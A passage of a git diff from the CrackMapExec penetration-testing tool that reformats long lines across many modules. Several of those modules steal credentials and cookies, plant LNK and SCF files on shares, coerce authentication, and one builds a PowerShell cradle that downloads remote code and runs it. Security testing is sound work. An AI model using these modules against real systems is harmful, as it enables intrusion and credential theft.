rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) + self.context.log.highlight(f"Key {self.key} exists with value {reg_value}") # Modification rrp.hBaseRegSetValue( remote_ops._RemoteOperations__rrp, @@ -156,9 +134,7 @@ class CMEModule: self.type, self.value, ) - self.context.log.success( - f"Key {self.key} has been modified to {self.value}" - ) + self.context.log.success(f"Key {self.key} has been modified to {self.value}") except: rrp.hBaseRegSetValue( remote_ops._RemoteOperations__rrp, @@ -167,16 +143,12 @@ class CMEModule: self.type, self.value, ) - self.context.log.success( - f"New Key {self.key} has been added with value {self.value}" - ) + self.context.log.success(f"New Key {self.key} has been added with value {self.value}") rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) else: # Query try: - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) + data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) self.context.log.highlight(f"{self.key}: {reg_value}") except: if self.delete: @@ -186,9 +158,7 @@ class CMEModule: return rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) except DCERPCException as e: - self.context.log.fail( - f"DCERPC Error while querying or modifying registry: {e}" - ) + self.context.log.fail(f"DCERPC Error while querying or modifying registry: {e}") except Exception as e: self.context.log.fail(f"Error while querying or modifying registry: {e}") finally: diff --git a/cme/modules/scan-network.py b/cme/modules/scan-network.py index 426c32df..313ff1dd 100644 --- a/cme/modules/scan-network.py +++ b/cme/modules/scan-network.py @@ -16,9 +16,7 @@ from ldap3 import LEVEL def get_dns_zones(connection, root, debug=False): - connection.search( - root, "(objectClass=dnsZone)", search_scope=LEVEL, attributes=["dc"] - ) + connection.search(root, "(objectClass=dnsZone)", search_scope=LEVEL, attributes=["dc"]) zones = [] for entry in connection.response: if entry["type"] != "searchResEntry": @@ -40,11 +38,7 @@ def get_dns_resolver(server, context): socket.inet_aton(server) dnsresolver.nameservers = [server] except socket.error: - context.info( - "Using System DNS to resolve unknown entries. Make sure resolving your" - " target domain works here or specify an IP as target host to use that" - " server for queries" - ) + context.info("Using System DNS to resolve unknown entries. Make sure resolving your" " target domain works here or specify an IP as target host to use that" " server for queries") return dnsresolver @@ -114,10 +108,7 @@ class CMEModule: else: print("Could not parse ONLY_HOSTS option.") if module_options and "ONLY_HOSTS" in module_options: - if ( - module_options["ONLY_HOSTS"].lower() == "true" - or module_options["ONLY_HOSTS"] == "1" - ): + if module_options["ONLY_HOSTS"].lower() == "true" or module_options["ONLY_HOSTS"] == "1": self.showhosts = True else: print("Could not parse ONLY_HOSTS option.") @@ -138,10 +129,7 @@ class CMEModule: ) except ldap.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the" - " data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the" " data received") # We reached the sizeLimit, process the answers we have already and that's it. 
Until we implement # paged queries list_sites = e.getAnswers() @@ -165,10 +153,7 @@ class CMEModule: if RECORD_TYPE_MAPPING[dr["Type"]] == "A": if dr["Type"] == 1: address = DNS_RPC_RECORD_A(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": outdata.append( { "name": recordname, @@ -176,16 +161,9 @@ class CMEModule: "value": address.formatCanonical(), } ) - if dr["Type"] in [ - a - for a in RECORD_TYPE_MAPPING - if RECORD_TYPE_MAPPING[a] in ["CNAME", "NS", "PTR"] - ]: + if dr["Type"] in [a for a in RECORD_TYPE_MAPPING if RECORD_TYPE_MAPPING[a] in ["CNAME", "NS", "PTR"]]: address = DNS_RPC_RECORD_NODE_NAME(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": outdata.append( { "name": recordname, @@ -195,10 +173,7 @@ class CMEModule: ) elif dr["Type"] == 28: address = DNS_RPC_RECORD_AAAA(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": outdata.append( { "name": recordname, @@ -208,31 +183,18 @@ class CMEModule: ) context.log.highlight("Found %d records" % len(outdata)) - path = expanduser( - "~/.cme/logs/{}_network_{}.log".format( - connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) - ) + path = expanduser("~/.cme/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) with codecs.open(path, "w", "utf-8") as outfile: for row in outdata: if self.showhosts: outfile.write("{}\n".format(row["name"] + "." + connection.domain)) elif self.showall: - outfile.write( - "{} \t {}\n".format( - row["name"] + "." + connection.domain, row["value"] - ) - ) + outfile.write("{} \t {}\n".format(row["name"] + "." 
+ connection.domain, row["value"])) else: outfile.write("{}\n".format(row["value"])) context.log.success("Dumped {} records to {}".format(len(outdata), path)) if not self.showall and not self.showhosts: - context.log.display( - "To extract CIDR from the {} ip, run the following command: cat" - " your_file | mapcidr -aa -silent | mapcidr -a -silent".format( - len(outdata) - ) - ) + context.log.display("To extract CIDR from the {} ip, run the following command: cat" " your_file | mapcidr -aa -silent | mapcidr -a -silent".format(len(outdata))) class DNS_RECORD(Structure): @@ -414,8 +376,6 @@ class DNS_RPC_RECORD_TS(Structure): def toDatetime(self): microseconds = int(self["entombedTime"] / 10) try: - return datetime.datetime(1601, 1, 1) + datetime.timedelta( - microseconds=microseconds - ) + return datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=microseconds) except OverflowError: return None diff --git a/cme/modules/scuffy.py b/cme/modules/scuffy.py index cfece488..044ebb2b 100644 --- a/cme/modules/scuffy.py +++ b/cme/modules/scuffy.py @@ -70,23 +70,13 @@ class CMEModule: if not self.cleanup: with open(self.scf_path, "rb") as scf: try: - connection.conn.putFile( - share["name"], self.file_path, scf.read - ) - context.log.success( - f"Created SCF file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, scf.read) + context.log.success(f"Created SCF file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error writing SCF file to share {share['name']}: {e}" - ) + context.log.fail(f"Error writing SCF file to share {share['name']}: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted SCF file on the {share['name']} share" - ) + context.log.success(f"Deleted SCF file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error deleting SCF file on share {share['name']}: {e}" - ) + context.log.fail(f"Error deleting SCF file on share {share['name']}: {e}") diff --git a/cme/modules/shadowcoerce.py b/cme/modules/shadowcoerce.py index fe4a82d3..ca93ac54 100644 --- a/cme/modules/shadowcoerce.py +++ b/cme/modules/shadowcoerce.py @@ -45,9 +45,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe="FssagentRpc", doKerberos=connection.kerberos, dcHost=connection.kdcHost, @@ -64,9 +62,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." 
+ connection.domain, pipe="FssagentRpc", ) @@ -86,9 +82,7 @@ class CMEModule: if result: context.log.highlight("VULNERABLE") - context.log.highlight( - "Next step: https://github.com/ShutdownRepo/ShadowCoerce" - ) + context.log.highlight("Next step: https://github.com/ShutdownRepo/ShadowCoerce") else: context.log.debug("Target not vulnerable to ShadowCoerce") @@ -211,9 +205,7 @@ class CoerceAuth: "UUID": ("a8e0653c-2744-4389-a61d-7373df8b2292", "1.0"), }, } - rpctransport = transport.DCERPCTransportFactory( - binding_params[pipe]["stringBinding"] - ) + rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"]) dce = rpctransport.get_dce_rpc() if hasattr(rpctransport, "set_credentials"): @@ -266,9 +258,7 @@ class CoerceAuth: dce.request(request) except Exception as e: cme_logger.debug("Something went wrong, check error status => %s", str(e)) - cme_logger.debug( - "Attack may of may not have worked, check your listener..." - ) + cme_logger.debug("Attack may of may not have worked, check your listener...") return False return True @@ -283,9 +273,7 @@ class CoerceAuth: dce.request(request) except Exception as e: cme_logger.debug("Something went wrong, check error status => %s", str(e)) - cme_logger.debug( - "Attack may of may not have worked, check your listener..." - ) + cme_logger.debug("Attack may of may not have worked, check your listener...") return False return True diff --git a/cme/modules/slinky.py b/cme/modules/slinky.py index 9f8d128b..ab631db9 100644 --- a/cme/modules/slinky.py +++ b/cme/modules/slinky.py @@ -69,23 +69,13 @@ class CMEModule: if not self.cleanup: with open(self.lnk_path, "rb") as lnk: try: - connection.conn.putFile( - share["name"], self.file_path, lnk.read - ) - context.log.success( - f"Created LNK file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, lnk.read) + context.log.success(f"Created LNK file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error writing LNK file to share {share['name']}: {e}" - ) + context.log.fail(f"Error writing LNK file to share {share['name']}: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted LNK file on the {share['name']} share" - ) + context.log.success(f"Deleted LNK file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error deleting LNK file on share {share['name']}: {e}" - ) + context.log.fail(f"Error deleting LNK file on share {share['name']}: {e}") diff --git a/cme/modules/spider_plus.py b/cme/modules/spider_plus.py index 12827b86..9d8c7ad1 100755 --- a/cme/modules/spider_plus.py +++ b/cme/modules/spider_plus.py @@ -43,9 +43,7 @@ def make_dirs(path): pass -get_list_from_option = lambda opt: list( - map(lambda o: o.lower(), filter(bool, opt.split(","))) -) +get_list_from_option = lambda opt: list(map(lambda o: o.lower(), filter(bool, opt.split(",")))) class SMBSpiderPlus: @@ -94,9 +92,7 @@ class SMBSpiderPlus: filelist = self.smb.conn.listPath(share, subfolder + "*") except SessionError as e: - self.logger.debug( - f'Failed listing files on share "{share}" in directory {subfolder}.' 
- ) + self.logger.debug(f'Failed listing files on share "{share}" in directory {subfolder}.') self.logger.debug(str(e)) if "STATUS_ACCESS_DENIED" in str(e): @@ -217,17 +213,11 @@ class SMBSpiderPlus: self.results[share][next_path] = { "size": humansize(result.get_filesize()), #'ctime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_ctime())), - "ctime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_ctime_epoch()) - ), + "ctime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_ctime_epoch())), #'mtime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_mtime())), - "mtime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_mtime_epoch()) - ), + "mtime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_mtime_epoch())), #'atime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_atime())), - "atime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_atime_epoch()) - ), + "atime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_atime_epoch())), } # The collection logic is here. You can add more checks based @@ -237,17 +227,13 @@ class SMBSpiderPlus: # of a RemoteFile object that perform a remote connection. file_extension = next_path[next_path.rfind(".") + 1 :] if file_extension in self.exclude_exts: - self.logger.debug( - f'The file "{next_path}" has an excluded extension' - ) + self.logger.debug(f'The file "{next_path}" has an excluded extension') continue # If there is not results in the file but the size is correct, # then we save it if result.get_filesize() > self.max_file_size: - self.logger.debug( - f"File {result.get_longname()} has size {result.get_filesize()}" - ) + self.logger.debug(f"File {result.get_longname()} has size {result.get_filesize()}") continue ## You can add more checks here: date, ... @@ -318,9 +304,7 @@ class CMEModule: description = "List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller then `SIZE`" supported_protocols = ["smb"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? 
def options(self, context, module_options): """ @@ -332,16 +316,10 @@ class CMEModule: """ self.read_only = module_options.get("READ_ONLY", True) - self.exclude_exts = get_list_from_option( - module_options.get("EXCLUDE_EXTS", "ico,lnk") - ) - self.exlude_dirs = get_list_from_option( - module_options.get("EXCLUDE_DIR", "print$") - ) + self.exclude_exts = get_list_from_option(module_options.get("EXCLUDE_EXTS", "ico,lnk")) + self.exlude_dirs = get_list_from_option(module_options.get("EXCLUDE_DIR", "print$")) self.max_file_size = int(module_options.get("SIZE", 50 * 1024)) - self.output_folder = module_options.get( - "OUTPUT", os.path.join("/tmp", "cme_spider_plus") - ) + self.output_folder = module_options.get("OUTPUT", os.path.join("/tmp", "cme_spider_plus")) def on_login(self, context, connection): context.log.display("Started spidering plus with option:") diff --git a/cme/modules/spooler.py b/cme/modules/spooler.py index 5c169a2e..328d4d6b 100644 --- a/cme/modules/spooler.py +++ b/cme/modules/spooler.py @@ -51,14 +51,8 @@ class CMEModule: self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host context.log.debug("StringBinding %s" % self.__stringbinding) rpctransport = transport.DCERPCTransportFactory(self.__stringbinding) - rpctransport.set_credentials( - connection.username, connection.password, connection.domain, lmhash, nthash - ) - rpctransport.setRemoteHost( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash) + rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain) rpctransport.set_dport(self.port) if connection.kerberos: @@ -70,16 +64,8 @@ class CMEModule: error_text = "Protocol failed: %s" % e context.log.critical(error_text) - if ( - RPC_PROXY_INVALID_RPC_PORT_ERR in error_text - or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text - or RPC_PROXY_CONN_A1_404_ERR in error_text - or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text - ): - context.log.critical( - "This usually means the target does not allow " - "to connect to its epmapper using RpcProxy." - ) + if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text: + context.log.critical("This usually means the target does not allow " "to connect to its epmapper using RpcProxy.") return # Display results. 
@@ -91,13 +77,8 @@ class CMEModule: if (tmp_uuid in endpoints) is not True: endpoints[tmp_uuid] = {} endpoints[tmp_uuid]["Bindings"] = list() - if ( - uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] - in epm.KNOWN_UUIDS - ): - endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[ - uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] - ] + if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS: + endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]] else: endpoints[tmp_uuid]["EXE"] = "N/A" endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8") @@ -112,9 +93,7 @@ class CMEModule: if "MS-RPRN" in endpoints[endpoint]["Protocol"]: context.log.debug("Protocol: %s " % endpoints[endpoint]["Protocol"]) context.log.debug("Provider: %s " % endpoints[endpoint]["EXE"]) - context.log.debug( - "UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"]) - ) + context.log.debug("UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"])) context.log.debug("Bindings: ") for binding in endpoints[endpoint]["Bindings"]: context.log.debug(" %s" % binding) diff --git a/cme/modules/subnets.py b/cme/modules/subnets.py index 9e6f475f..9ef589a7 100644 --- a/cme/modules/subnets.py +++ b/cme/modules/subnets.py @@ -29,15 +29,9 @@ class CMEModule: self.showservers = True if module_options and "SHOWSERVERS" in module_options: - if ( - module_options["SHOWSERVERS"].lower() == "true" - or module_options["SHOWSERVERS"] == "1" - ): + if module_options["SHOWSERVERS"].lower() == "true" or module_options["SHOWSERVERS"] == "1": self.showservers = True - elif ( - module_options["SHOWSERVERS"].lower() == "false" - or module_options["SHOWSERVERS"] == "0" - ): + elif module_options["SHOWSERVERS"].lower() == "false" or module_options["SHOWSERVERS"] == "0": self.showservers = False else: print("Could not parse showservers option.") @@ -75,23 +69,11 @@ class CMEModule: attributes=["distinguishedName", "name"], sizeLimit=999, ) - if ( - len( - [ - subnet - for subnet in list_subnets - if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) - ] - ) - == 0 - ): + if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0: context.log.highlight('Site "%s"' % site_name) else: for subnet in list_subnets: - if ( - isinstance(subnet, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True: continue subnet = searchResEntry_to_dict(subnet) subnet_dn = subnet["distinguishedName"] @@ -105,35 +87,14 @@ class CMEModule: attributes=["cn"], sizeLimit=999, ) - if ( - len( - [ - server - for server in list_servers - if isinstance( - server, ldapasn1_impacket.SearchResultEntry - ) - ] - ) - == 0 - ): + if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0: if len(site_description) != 0: - context.log.highlight( - 'Site "%s" (Subnet:%s) (description:"%s")' - % (site_name, subnet_name, site_description) - ) + context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description)) else: - context.log.highlight( - 'Site "%s" (Subnet:%s)' % (site_name, subnet_name) - ) + context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name)) else: for server in list_servers: - if ( - isinstance( - server, ldapasn1_impacket.SearchResultEntry - ) - is not True - ): + if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not 
True: continue server = searchResEntry_to_dict(server)["cn"] if len(site_description) != 0: @@ -147,17 +108,9 @@ class CMEModule: ) ) else: - context.log.highlight( - 'Site "%s" (Subnet:%s) (Server:%s)' - % (site_name, subnet_name, server) - ) + context.log.highlight('Site "%s" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server)) else: if len(site_description) != 0: - context.log.highlight( - 'Site "%s" (Subnet:%s) (description:"%s")' - % (site_name, subnet_name, site_description) - ) + context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description)) else: - context.log.highlight( - 'Site "%s" (Subnet:%s)' % (site_name, subnet_name) - ) + context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name)) diff --git a/cme/modules/teams_localdb.py b/cme/modules/teams_localdb.py index af8dff1e..11d03798 100644 --- a/cme/modules/teams_localdb.py +++ b/cme/modules/teams_localdb.py @@ -23,9 +23,7 @@ class CMEModule: with open("/tmp/teams_cookies2.txt", "wb") as f: for path in paths: try: - connection.conn.getFile( - "C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write - ) + connection.conn.getFile("C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write) context.log.highlight("Found Cookie file in path " + path) found = 1 self.parse_file(context, "skypetoken_asm") @@ -36,9 +34,7 @@ class CMEModule: if "STATUS_SHARING_VIOLATION" in str(e): context.log.debug(str(e)) context.log.highlight("Found Cookie file in path " + path) - context.log.fail( - "Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database" - ) + context.log.fail("Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database") if found == 0: context.log.display("No cookie file found in Users folder") @@ -50,9 +46,7 @@ class CMEModule: c.execute("SELECT value FROM cookies WHERE name = '" + name + "'") row = c.fetchone() if row is None: - context.log.fail( - "No " + name + " present in Microsoft Teams Cookies database" - ) + context.log.fail("No " + name + " present in Microsoft Teams Cookies database") else: context.log.success("Succesfully extracted " + name + ": ") context.log.success(row[0]) diff --git a/cme/modules/uac.py b/cme/modules/uac.py index f17e9544..f57c731c 100644 --- a/cme/modules/uac.py +++ b/cme/modules/uac.py @@ -33,9 +33,7 @@ class CMEModule: "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ) keyHandle = ans["phkResult"] - dataType, uac_value = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "EnableLUA" - ) + dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "EnableLUA") if uac_value == 1: context.log.highlight("UAC Status: 1 (UAC Enabled)") diff --git a/cme/modules/user_desc.py b/cme/modules/user_desc.py index ae7a6010..bf127e18 100644 --- a/cme/modules/user_desc.py +++ b/cme/modules/user_desc.py @@ -53,19 +53,13 @@ class CMEModule: self.search_filter += f"(description={module_options['DESC_FILTER']})" if "DESC_INVERT" in module_options: - self.search_filter += ( - f"(!(description={module_options['DESC_INVERT']}))" - ) + self.search_filter += f"(!(description={module_options['DESC_INVERT']}))" if "USER_FILTER" in module_options: - self.search_filter += ( - f"(sAMAccountName={module_options['USER_FILTER']})" - ) + self.search_filter += f"(sAMAccountName={module_options['USER_FILTER']})" if "USER_INVERT" in module_options: - self.search_filter += ( - 
f"(!(sAMAccountName={module_options['USER_INVERT']}))" - ) + self.search_filter += f"(!(sAMAccountName={module_options['USER_INVERT']}))" self.search_filter += ")" @@ -80,12 +74,8 @@ class CMEModule: On successful LDAP login we perform a search for all user objects that have a description. Users can specify additional LDAP filters that are applied to the query. """ - self.create_log_file( - connection.conn.getRemoteHost(), datetime.now().strftime("%Y%m%d_%H%M%S") - ) - context.log.info( - f"Starting LDAP search with search filter '{self.search_filter}'" - ) + self.create_log_file(connection.conn.getRemoteHost(), datetime.now().strftime("%Y%m%d_%H%M%S")) + context.log.info(f"Starting LDAP search with search filter '{self.search_filter}'") try: sc = ldap.SimplePagedResultsControl() @@ -155,18 +145,14 @@ class CMEModule: description = attribute["vals"][0].asOctets().decode("utf-8") except Exception as e: entry = sAMAccountName or "item" - self.context.error( - f"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'" - ) + self.context.error(f"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'") if description and sAMAccountName not in self.account_names: self.desc_count += 1 self.append_to_log(sAMAccountName, description) if self.highlight(description): - self.context.log.highlight( - f"User: {sAMAccountName} - Description: {description}" - ) + self.context.log.highlight(f"User: {sAMAccountName} - Description: {description}") self.account_names.add(sAMAccountName) diff --git a/cme/modules/veeam_dump.py b/cme/modules/veeam_dump.py index 6dfbff32..b8c850cc 100644 --- a/cme/modules/veeam_dump.py +++ b/cme/modules/veeam_dump.py @@ -24,9 +24,7 @@ class CMEModule: multiple_hosts = True def __init__(self): - with open( - get_ps_script("veeam_dump_module/veeam-creds_dump.ps1"), "r" - ) as psFile: + with open(get_ps_script("veeam_dump_module/veeam-creds_dump.ps1"), "r") as psFile: self.psScript = psFile.read() def options(self, context, module_options): @@ -55,15 +53,9 @@ class CMEModule: ) keyHandle = ans["phkResult"] - SqlDatabase = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName" - )[1].split("\x00")[:-1][0] - SqlInstance = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName" - )[1].split("\x00")[:-1][0] - SqlServer = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName" - )[1].split("\x00")[:-1][0] + SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName")[1].split("\x00")[:-1][0] + SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName")[1].split("\x00")[:-1][0] + SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName")[1].split("\x00")[:-1][0] except DCERPCException as e: if str(e).find("ERROR_FILE_NOT_FOUND"): @@ -84,23 +76,16 @@ class CMEModule: self.psScript = self.psScript.replace("REPLACE_ME_SqlServer", SqlServer) psScipt_b64 = b64encode(self.psScript.encode("UTF-16LE")).decode("utf-8") - output = connection.execute( - "powershell.exe -e {} -OutputFormat Text".format(psScipt_b64), True - ) + output = connection.execute("powershell.exe -e {} -OutputFormat Text".format(psScipt_b64), True) # Format ouput if returned in some XML Format if "CLIXML" in output: output = self.stripXmlOutput(context, output) # Stripping whitespaces and newlines - output_stripped = [ - " ".join(line.split()) for line in output.split("\r\n") if 
line.strip() - ] + output_stripped = [" ".join(line.split()) for line in output.split("\r\n") if line.strip()] # Error handling - if ( - "Can't connect to DB! Exiting..." in output_stripped - or "No passwords found!" in output_stripped - ): + if "Can't connect to DB! Exiting..." in output_stripped or "No passwords found!" in output_stripped: context.log.fail(output_stripped[0]) return @@ -109,14 +94,8 @@ class CMEModule: context.log.highlight(user + ":" + password) def on_admin_login(self, context, connection): - SqlDatabase, SqlInstance, SqlServer = self.checkVeeamInstalled( - context, connection - ) + SqlDatabase, SqlInstance, SqlServer = self.checkVeeamInstalled(context, connection) if SqlDatabase and SqlInstance and SqlServer: - context.log.success( - 'Found Veeam DB "{}" on SQL Server "{}\\{}"! Extracting stored credentials...'.format( - SqlDatabase, SqlServer, SqlInstance - ) - ) + context.log.success('Found Veeam DB "{}" on SQL Server "{}\\{}"! Extracting stored credentials...'.format(SqlDatabase, SqlServer, SqlInstance)) self.extractCreds(context, connection, SqlDatabase, SqlInstance, SqlServer) diff --git a/cme/modules/wdigest.py b/cme/modules/wdigest.py index 016f23c2..b4ac87e5 100644 --- a/cme/modules/wdigest.py +++ b/cme/modules/wdigest.py @@ -58,14 +58,10 @@ class CMEModule: 1, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00") if int(data) == 1: - context.log.success( - "UseLogonCredential registry key created successfully" - ) + context.log.success("UseLogonCredential registry key created successfully") try: remoteOps.finish() @@ -111,9 +107,7 @@ class CMEModule: "UseLogonCredential\x00", ) except DCERPCException: - context.log.success( - "UseLogonCredential registry key deleted successfully" - ) + context.log.success("UseLogonCredential registry key deleted successfully") try: remoteOps.finish() diff --git a/cme/modules/web_delivery.py b/cme/modules/web_delivery.py index d1ef7a80..c26ee3ba 100644 --- a/cme/modules/web_delivery.py +++ b/cme/modules/web_delivery.py @@ -38,9 +38,7 @@ class CMEModule: self.payload = module_options["PAYLOAD"] def on_admin_login(self, context, connection): - ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format( - self.url - ) + ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format(self.url) if self.payload == "32": connection.ps_execute(ps_command, force_ps32=True) else: diff --git a/cme/modules/webdav.py b/cme/modules/webdav.py index f5bea23a..81e6f0fa 100644 --- a/cme/modules/webdav.py +++ b/cme/modules/webdav.py @@ -36,9 +36,7 @@ class CMEModule: that the WebClient service is running on the target. 
""" try: - remote_file = RemoteFile( - connection.conn, "DAV RPC Service", "IPC$", access=FILE_READ_DATA - ) + remote_file = RemoteFile(connection.conn, "DAV RPC Service", "IPC$", access=FILE_READ_DATA) remote_file.open() remote_file.close() diff --git a/cme/modules/whoami.py b/cme/modules/whoami.py index 7265fc25..3b7b86f1 100644 --- a/cme/modules/whoami.py +++ b/cme/modules/whoami.py @@ -8,9 +8,7 @@ class CMEModule: description = "Get details of provided user" supported_protocols = ["ldap"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """ @@ -27,9 +25,7 @@ class CMEModule: else: searchFilter = f"(sAMAccountName={format(self.username)})" - context.log.debug( - f"Using naming context: {searchBase} and {searchFilter} as search filter" - ) + context.log.debug(f"Using naming context: {searchBase} and {searchFilter} as search filter") # Get attributes of provided user r = connection.ldapConnection.search( @@ -72,9 +68,7 @@ class CMEModule: for group in response["vals"]: context.log.highlight(f"Member of: {group}") elif "servicePrincipalName" in str(response["type"]): - context.log.highlight( - f"Service Account Name(s) found - Potentially Kerberoastable user!" - ) + context.log.highlight(f"Service Account Name(s) found - Potentially Kerberoastable user!") for spn in response["vals"]: context.log.highlight(f"Service Account Name: {spn}") else: diff --git a/cme/modules/winscp_dump.py b/cme/modules/winscp_dump.py index 65e14540..99fd89a9 100644 --- a/cme/modules/winscp_dump.py +++ b/cme/modules/winscp_dump.py @@ -70,14 +70,11 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" - + userObject, + "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject, ) keyHandle = 